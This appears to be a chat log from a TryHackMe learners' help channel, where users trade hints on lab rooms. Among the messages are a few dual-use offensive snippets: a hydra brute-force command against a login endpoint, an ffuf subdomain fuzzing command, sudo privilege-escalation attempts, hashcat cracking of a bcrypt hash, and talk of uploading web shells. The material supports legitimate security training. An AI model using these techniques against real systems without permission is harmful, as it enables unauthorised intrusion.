hold on a second I am about to Lyft home and then I really want to chat further on this. You'll still be here for a while right?

yes

I checked the question hint

hold on a second

solved

thanks

hey there fellow ethical hackers! I'm hoping someone can help me out here. my answer for PrintNightmare v1.6 Attacked, Task 6, last question is not working. I've tried both ways with the time stamp, using - or : as the answer key shows : and the question shows -. I'm 100% positive I have the right DLL with the right path and time stamp.. it's just not working.

https://tryhackme.com/room/printnightmarehpzqlp8

lol nvm 🙂

i followed that

hmmmm

so what can i do to run vhost on ip

aha i didnt understand that till now

thx alot

Hello, any nudge on inferno machine please ?

bruteforcing is the way

Thanks 🙏

I could bypass the login form but when i try to use the codiad rce exploit it doesn’t execute because of http basic authentication, any tips on how to circumvent this ?

Inferno machine

?

sorry not done that room so dunno how to help

Hello

VulnUniversity. Can't seem to figure out what im supposed to do with the hint for the final challenge. Wasn't sure if it was a continuation of something like using msf or making a custom reverse shell entry, or killing some service running to protect login attempts.

"THE" SUID file? no... I don't think so. I did the find from the previous hint to show that the file in the second hint had the S bit

Found several

hmm

i figured it was literally the file from the hint, but i haven't figured out what to do with that information

yeah, I try to not do that because I don't wanna accidentally click on a guide. I'll try that in a few. I'll keep looking at this specifically

thank you

derp

lol

when you try so hard you forget simple things exist

thanks

got it

i was doing simple-ctf and i was stuck cuz i was only looking forward to exploit ssh but now i got it cuz somebody helped me what to do in this chat but the thing i dont get is how did he know and how did he do to get cms model

pls can somebody share me how to detect cms model

i scan with nmap but all i got was ftp, http, and ssh

no sign of cms

I am solving musttacio.i have found admin panel but unable to proceed further.A nudge would be appreciated

Look at the bottom of the website.

Did you use gobuster?

I used dirsearch on that port but only found two directors with code 403 @lucid junco .

Tried enumerating further but no success

Is it coz of the wordless?

Wordlists*

Which wordlist did you use?

Dirbuster/directory-list-2.3-small.txt

Another one was default in dirsearch

Try common.txt in the Web-Content of secLists.

Okk thanks will try

Search for php & txt if you know how 😉

Sure thanks!

Gave +1 Rep to @lucid junco

https://developer.mozilla.org/en-US/docs/Web/HTTP/Authentication Hopefully it helps.

hi , i am in the Network Service room in the enumeration telnet. i scan with nmap but all the ports are closed. what i am doing wron?

you have your vpn connected?

i am with the attack box

!docs verify

share screenshot please

try giving 5-6 minutes after starting the machine

thats the thing!

how i can scan more ports?

how much port do i have to scan?

i am over 6000

now

lol

it can be even 9000

before that i used what i saw in a video nmap -A -p- <ip> -vv but i havent the patience then to wait. thinking it was a wrong way

less patience, add -T4 😄

also tried

what it suppose to do?

Less time

thank you guys

see you

✌️ 😎

HI , the next question is what it can be used for.. i know that it suppose to be in the nmap details but i dont see anything special

do i have to scan in a different way?

-T1-5 is speed,

Just bear in mind the faster you are, the louder you are.

hence go crazy and send multiple thousands of packets a sec

hi, I'm currently doing Linux PrivEsc room, and trying to escalate my privileges by using "options" from apache2 program but I don't really figure it out..

I tried some basic commands based on what I was trying to do with other programs on the list, for example : "sudo apache2 -f /etc/passwd" or "sudo apache2 -C /bin/sh" and almost all other logical options from man page, but I'm just getting error messages without any root shell, I can't modify the config file in /etc/apache2/apache2.conf neither, any tips to do it ?

I did some research on internet, but nothing valuable in first page, and I'm sure it's not so hard doing it, I just need to use the right option, maybe something linked with interacting with a file or a path, similar to other program...

On which task? 6?

Yes, but I think I understood, I will not have a shell escape sequence with that program right ? But I can use it to access interesting files ?

I think they are just explaining how it works. I don't see that apache2 is installed on that VM.

I don't know if it's the meaning of "how you might use this program with sudo to gain root privileges without a shell escape sequence"

the hints of the last question says "play around with certain options the program has!" so it seems possible

and the program is effectively installed, I find it with tab completion

so basically, I think that I can use it to gain a root shell access

by properly using one of its option

I don't think that I need to use CVE or editing a config file, it's seem easier than that

my only way for now is to understand that I can't directly gain it, but is it the real answer ? 🤔 I maybe deserved checking it on the internet to confirm my thinking 😆

Apologies, I was looking at the wrong room. There are quite a few Linux PrivEsc rooms... I don't have time to check this other one. Maybe someone else can answer you.

It looks like it's a possibility, https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics check there for some more info. Hope it helps, good luck!

thanks, that's what I saw on writeups on internet, my thinking was the right, thanks !

i was doing simple ctf ... i got the cms login page and i have the python3 exploit script but the thing is that the script results are kinda useless so im stuck at "what is the password?" ... it would be great if someone give a hint ... thank u

Like passwords are like one word only and results r always changing

i am not really sure about python3, but i created python2 virtualenv and its working in my case.

I'm currently working on Attacktive Directory, and I can't get Kerbrute to work. it keeps telling me the KDCs cannot be found for the realm

very new to the hacking worlds so go easy on me if it's simple

I just used python 3 cuz it doesn't show any errors but i will try to fix python2 code by googling and will run again

scratch my question I figured it out, was just mistyping the --dc flag with only 1 -

Room: Metasploit: Exploitation
Task: 5

I'm unable to do a simple nmap scan on my target machine. I'm running kali locally and haven't experienced this issue before. I'm connected via OVPN but it cannot seem to scan the target ip since it says host is down. (It's not blocking ping) So far I've tried reinstalling OVPN, Reininating target machine and restarting pc but doesn't seem to do it.

Did you try adding -Pn like it said?

Yes, as mentioned it's not blocking ping requests.

Need help in the user agent part from agent sudo room

room:Nmap Basic Port Scans
Task:4 TCP Connect Scan
What is Nmap’s guess about the newly installed service?
I searched for it in the task many times and searched for it in Google couldn't find the answer any where. I need at least a hint.

@burnt rivet thx

Gave +1 Rep to @burnt rivet

(uploading vulnerabilites) Once I've upload a shell on the site, how do I use it ?

I'll continue to search

thanks anyway

Gave +1 Rep to @burnt rivet

i am doing the hydra room. i have run the command to brute force the web password, however none of the potential passwords work. can someone help me please

what would you like a screenshot of?

the command

or output

ill try

im pretty sure i have?

ahh i just realized what you mean

ive changed the fail condition and its still not working

its giving out the same result

ive just figured it out

thank you for your help though

anyone know what this encoded string for in Pickle Rick room?

base64

Use magic in cyberchef

yea i know how it turns out but i wanna know what it is used for in that room

if u mean it's for login to|| portal.php||, there is another credential already and i completed the room without even the need of this encoded string

i completed it long ago but i just redo it again

I have question about a Linux Forensics for some room hints. I did figured it out but It cannot find it somewhere.

could you help me out for short question?

can u state your problem right away and don't ask for help like this so people can actually help

I am not asking to help. but I was not sure where the answer find on Task 6 and 7

Burp Suite: The Basics, Task 9
I can't even see an option that matches the answer format

so I'm not really sure which right-click menu this is referring to

This is the only right click menu I can find :(

Have you tried looking in the sub-menu ?

Yup

Then you'd have found the answer.

Right click brings up the menu, you're looking in one of the menus that branch off this menu.

Did you get it?

Yeah, I didn't really think that Do intercept response is the thing I need for some reason
Thanks!

hey j'ai besoin d'aider sil vous plait

je suis dans la salle deux operating system security mais je ne comprends pass ce qu'il faut faire

pouvez vous m'aider ? please

Please keep it on English.

can you help me for a room please?

I got to operating system security, Task 3, but I can't

I can't figure out what I should do

yes but there are 3 questions, do I have to fill in some things in the Linux system?

I can not

to log in as Johnny

I tried to copy the 1st terminal but with the information on johnny

I found the passwords in the list but I can't log in

what terminal do i need to type in to be able to log in as johnny?

I only have the two terminals in example that I tried to copy on the attackbox

I'm waiting for them to check

Oh good ? oh crap i think i really suck lol

Hey for the Content Discovery module inside Jr Pen Testing, Has the OWASP favicon website been updated recently?

Essentially is the module up to date

Disregard

I need help in splunk101 task7

Highest evenID? Is it 22??

I got it. it should be all time

hi what the right formulation for nmap ? i am in enumeration telnet
i wrote -- nmap -A -T4 -p- 10.10.204.200 -vv

i dont see the name of the port that i suppose to see open

i saw scanning 10.10.209.200 [1 port]

it means one port open , no?

a really long one

but nothing about a list of port

is this the right formulation to get list of open ports>
?

ok so maybe i need to be patient

i know thats the reason i wrote the scan as it. to scan more ports

more than the 1000 first

oh!! thats it ! i got the port name

hello all, im on the hashing - crypto 101 room, and im trying to decrypt the hashes from the questions but im not being able to, it say i can use the rockyou list and kali but im not sure what i suppose to do, so for example i have the hash: $2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG
and already unzip the rockyou list but what im suppose to do now? do i need a library?
i already use hashid 'hash here' but wanst what i was expected as i already know its from bycript

so for anyone that may have the same question you have to use hashcat, and select the wordlist at the end, after putting the hash

https://securiumsolutions.com/blog/how-to-use-hashcat-the-powerful-cracking-tool/

What skills would you guys say are necessary to complete Pickle Rick?

network enumeration, web enumeration and fuzzing, encoding, binary misconfiguration.

@hexed crescent thanks for the response gonna need to look at binary misconfiguration

Gave +1 Rep to @hexed crescent

hi, it says there is more than one path to root in this room https://tryhackme.com/room/relevant
but I couldn't find anyone using anything other than printspoofer

Hello everyone I’m trying to use my personal VM KALI to solve one of the Ctf from THM, but my Kali won’t ping the ip no matter how much I try is there anything Else I should be doing and I’m missing or do anyone have an idea why my Kali won’t be able to work for THM…would appreciate helpful advice thanks

I try to to nmap too that won’t work either

Nothing of such

and I will give this a try too thanks

Gave +1 Rep to @burnt rivet

I have a problem in attackbox
That the msfvenom command not found
And I don't what should I do for this problem

how to use burpsuite to create the php loads

What's your syntax?

Hello

Anyone here?

Okay. I'm in room Password Attacks task 5 it wanted me to use hashcat to crack a SHA1 hash, I did that and got a result but its not the value the question is looking for. And I double checked and used the right argument for SHA-1 -m100

the one u highlighted is the attempted password

Oh I see, haha well thanks

+rep @burnt rivet

Gave +1 Rep to @burnt rivet

Gave +1 Rep to @languid isle

Whats the rep thing? Should I be doing that?

u don't need to

Hi everyone, I'm doing the Network Services room and the assignment is to
Conduct an nmap scan of your choosing, How many ports are open?
I'm not understanding what it's asking me to nmap. I tried nmap the attackbox that started from that room but the answers aren't correct (10 open ports)

Yeah I started that

Oh yeah I was looking at the ip of my own attackbox sorry. Thanks for the help

Hello. I'm in the room Password Attacks on Task 8. It wants me to "generate a rules-based dictionary from a wordlist." I generated the wordlist "clinic.lst" and am I understanding the instructions right that it wants me to first create a custom rule in john.conf and then use that rule on the wordlist?

I'm taking a peek at these hints too

Please help me in solving file inclusion room challenge

Ask your question.

how can I use hydra with this request?

room is overpass

do u know username?

I guess

I got like 6 usernames to try

I dont know what to put in the last part of the command in the quotation marks

||hydra -L userlist -P password "/api/login:username=^USER^&password=^PASS^:wrong-login-message"||

the fail message after u login

oh I was missing the /api/login part

ty

u need to specify path for it

got it

I try to figure it out the room-hint.

Which room/task ?

(Room: Linux Forensics/Task 6)

(Room: Linux Forensics/Task 6) below what post it

Have you got the answer yet? I left to eat

I cannot find the answer yet.

I got the answer from the ||first screenshot.||

Maybe I miss something

hello,
please how can i login to ftp from nc.

yes i googled it.

LinuxStrengthTraining - Task 9, question 3.
I feel like either I'm missing a wordlist or the word is not in the wordlists. I suspect I'm missing a wordlist, I ran through all mine, tried all the matching characters (based on the number of * on the answer format hint) and none worked.

i tried this.

it keep asking for username and password

how can i authenticate?

I even reversed them all and didn't find it

i think the service allow anonymous login.

what room are you on?

I know what it starts with... that's only 5 digits worth of brute forcing.............. hmmmmmmmmmmmm lol

thanks

will do

my notes are erm...

lacking 🙂

thanks

Found it. Sheesh, can't believe I missed that lol. Thank you.

Gave +1 Rep to @burnt rivet

What a strange word to try and say... reminds me of like... moist, or daddy 😂

LinuxStrengthTraining - Task 9, question 4.
Is the hash in the user table for debian-sys-maint a rabbit hole?

nvm

CTF (beginners)task 1 , last question: anyone knows how to decode this:
LS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0KLS0tLS0gLS0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tLS0gLi0tLS0gLS0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0gLi0tLS0KLS0tLS0gLi0tLS0gLi0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0gLS0tLS0KLS0tL

Can you do base64 ?

I've tried. Show nothing

does it show something like this? ||----- .---- .---- ----- ----- ----- ----- -----||?

yes, looks like morse code

Correct

This is where I got stuck. From Morse code it's show binary and then the binary gives me nothing

!docs verify

share screenshot of your output

Hey there!
I could need a little hint.
Currently I am stuck in the File Inclusion room. I am supposed to "Now apply what we discussed, try to read files within the server, and figure out the directory specified in the include function and answer question #2 below."

I thought maybe I have to go through the list of file locations from the previous task to find the solution, but that didn't help so far.

Can someone of you maybe help me out here with a tip on what to do or what to google to solve the second question?
I am not sure how to get to the include function and check what directory is specified

make sure to read the hint

i actually forgot that there were hints 😅 thanks

Gave +1 Rep to @cold eagle

i mean, it says include_path here, but that doesn't seem to be the answer at all

ohhh

now i see

you are solving lab1, you should solve lab2

dammit

thanks again :D I probably should learn how to read first. Cant believe this easy task costed me that long

Gave +1 Rep to @cold eagle

stock on task 13 in burp suite basics. im not sure what to look for , the hint say a page madeup of series of number and letters?

i just dont see it

check the sitemap section in burp... then click the links around on the website while being connected to the burp proxy( you can leave intercept off but still be connected to the proxy) after a while you should get a result in the sitemap while doing that that is a random word/string of chars.... visiting that page will give you the flag

GOTIT! THNX BRO

no problem

Ah, I posted the wrong screenshot of this question hint on Task 6 in Linux Forensics.

never mind
I found the answer on Task 6

hey can anyone help me out with this error im getting in Jr pentesting -> introduction to web hacking -> subdomain enumeration -> task 6.
i keep entering the command exactly as its given but the results im getting keep saying error. i looked on the forum post posts and it looked like alot of other people had the same error but i did not find a solution that worked there. anyone whos done it got any hints?

Are you using the Attackbox?

Or a VM?

attack box

Strange, because it worked for me when I done it.

Are you doing it now?

yes

Can you verify your profile and send a screenshot?

!docs verify

yea one sec

@lucid junco I dm'ed you the ss

and verified

you're not verified, and I meant in here, not dm's

it might need a min or something i put in my token

In the DM, what happens when you hit enter?

it prints the stuff above it

i just had it typed there so u could see what i had typed

Strange

Try this

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.254.234 -fs 2593

yeah still giving me the same thing @lucid junco

You're on the attackbox, yes?

yes

i still get this

You could try terminating the attack box and starting a new one

i tried that multiple times too XD

i even tried it on a different computer

I mean, your target works on my attackbox lol

i dont understand why its like this ;-;;;

Maybe @burnt rivet will know, if they're around.

They have it, it's in my DM's

i tried that too

😂

wat the absolute fk